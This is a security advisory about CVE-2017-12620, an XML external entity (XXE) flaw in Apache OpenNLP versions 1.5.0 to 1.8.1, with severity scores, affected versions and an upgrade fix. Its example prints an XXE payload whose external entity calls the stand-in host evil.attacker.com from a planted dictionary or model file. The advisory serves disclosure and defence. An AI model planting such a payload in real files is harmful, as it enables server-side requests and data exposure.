Apache OpenNLP XXE vulnerability

2017.10.03

Credit: Jörn Kottmann

Risk: High

Local: No

Remote: Yes

CVE: CVE-2017-12620

CWE: CWE-611

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

Severity: Medium


Vendor:
The Apache Software Foundation


Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1


Description:
When loading models or dictionaries that contain XML it is possible to
perform an XXE attack, since OpenNLP is a library, this only affects
applications that load models or dictionaries from untrusted sources.



Mitigation:
All users who load models or XML dictionaries from untrusted sources
should update to 1.8.2.


Example:

An attacker can place this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>

Inside one of the XML files, either a dictionary or embedded inside a
model package, to demonstrate this vulnerability.


Credit:
This issue was discovered by ﻿Nishil Shah of Salesforce.


Regards,
Jörn Kottmann

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Apache OpenNLP XXE vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.